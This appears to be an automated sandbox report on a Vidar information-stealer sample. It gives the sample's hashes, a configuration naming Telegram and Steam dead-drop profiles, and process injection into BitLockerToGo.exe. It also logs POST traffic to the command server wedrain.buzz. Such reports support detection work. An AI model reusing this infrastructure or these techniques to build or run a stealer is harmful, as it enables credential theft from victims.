Analysis
max time kernel: 95s
max time network: 125s
platform: windows10-2004_x64
resource: win10v2004-20250129-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250129-en, locale:en-us, os:windows10-2004-x64, system
submitted: 03/02/2025, 01:56 UTC
Static task: static1
Behavioral task: behavioral1
Sample: 2025-02-03_ac096bb96571bc19729743513e206d6c_frostygoop_poet-rat_snatch.exe
Resource: win7-20240708-en
General
Target: 2025-02-03_ac096bb96571bc19729743513e206d6c_frostygoop_poet-rat_snatch.exe
Size: 4.6MB
MD5: ac096bb96571bc19729743513e206d6c
SHA1: 8d55c52e5a2ac82f0fb2f1d36ad6c599897218c9
SHA256: 43f3820f0f725b537a3d01b1b80b58cb6696a7cf303998bac340670792910c1e
SHA512: 480df7dcd43b5a2b81102201ae16a4a0260093bc3feeb3f973faa6779450149b81fd7464a208545af15b9f4cfcf37a49f86b4ceff072ce8e744dac0e39fa36e2
SSDEEP: 49152:VuCfqCO438izFQu4+uCtIETopo+jl5LPYiVjOts6x1c:VPfqC3hQu9vt4oC
Malware Config
Extracted: vidar
https://t.me/sc1phell
https://steamcommunity.com/profiles/76561199819539662
user_agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
Signatures
-
Detect Vidar Stealer (3 IoCs)
resource | yara_rule
behavioral2/memory/4640-1-0x0000000000400000-0x0000000000422000-memory.dmp | family_vidar_v7
behavioral2/memory/4640-2-0x0000000000400000-0x0000000000422000-memory.dmp | family_vidar_v7
behavioral2/memory/4640-9-0x0000000000400000-0x0000000000422000-memory.dmp | family_vidar_v7
-
Vidar family
-
Suspicious use of SetThreadContext (1 IoCs)
description | pid | Process | procid_target
PID 4148 set thread context of 4640 | 4148 | 2025-02-03_ac096bb96571bc19729743513e206d6c_frostygoop_poet-rat_snatch.exe | 92
-
System Location Discovery: System Language Discovery (1 TTPs, 2 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 2025-02-03_ac096bb96571bc19729743513e206d6c_frostygoop_poet-rat_snatch.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | BitLockerToGo.exe
-
Suspicious use of WriteProcessMemory (11 IoCs)
description | pid | Process | procid_target
PID 4148 wrote to memory of 4640 | 4148 | 2025-02-03_ac096bb96571bc19729743513e206d6c_frostygoop_poet-rat_snatch.exe | 92 (11 identical entries)
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-02-03_ac096bb96571bc19729743513e206d6c_frostygoop_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2025-02-03_ac096bb96571bc19729743513e206d6c_frostygoop_poet-rat_snatch.exe"
PID: 4148
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    PID: 4640
    - System Location Discovery: System Language Discovery
Network
-
Remote address: 8.8.8.8:53
Request: t.me IN A
Response: t.me IN A 149.154.167.99
-
Remote address: 149.154.167.99:443
Request:
GET /sc1phell HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Mon, 03 Feb 2025 01:56:55 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12340
Connection: keep-alive
Set-Cookie: stel_ssid=46d36ee177b72679a2_11261387072389336251; expires=Tue, 04 Feb 2025 01:56:55 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
-
Remote address: 8.8.8.8:53
Request: wedrain.buzz IN A
Response: wedrain.buzz IN A 5.75.209.106
-
Remote address: 5.75.209.106:443
Request:
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
Host: wedrain.buzz
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Mon, 03 Feb 2025 01:56:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address: 5.75.209.106:443
Request:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----kx4opzcbi5fcbie37q9r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
Host: wedrain.buzz
Content-Length: 256
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Mon, 03 Feb 2025 01:56:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address: 8.8.8.8:53
Request: 99.167.154.149.in-addr.arpa IN PTR
Response:
-
Remote address: 5.75.209.106:443
Request:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----jmyu379zc2vaieusr1v3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
Host: wedrain.buzz
Content-Length: 299
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Mon, 03 Feb 2025 01:56:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive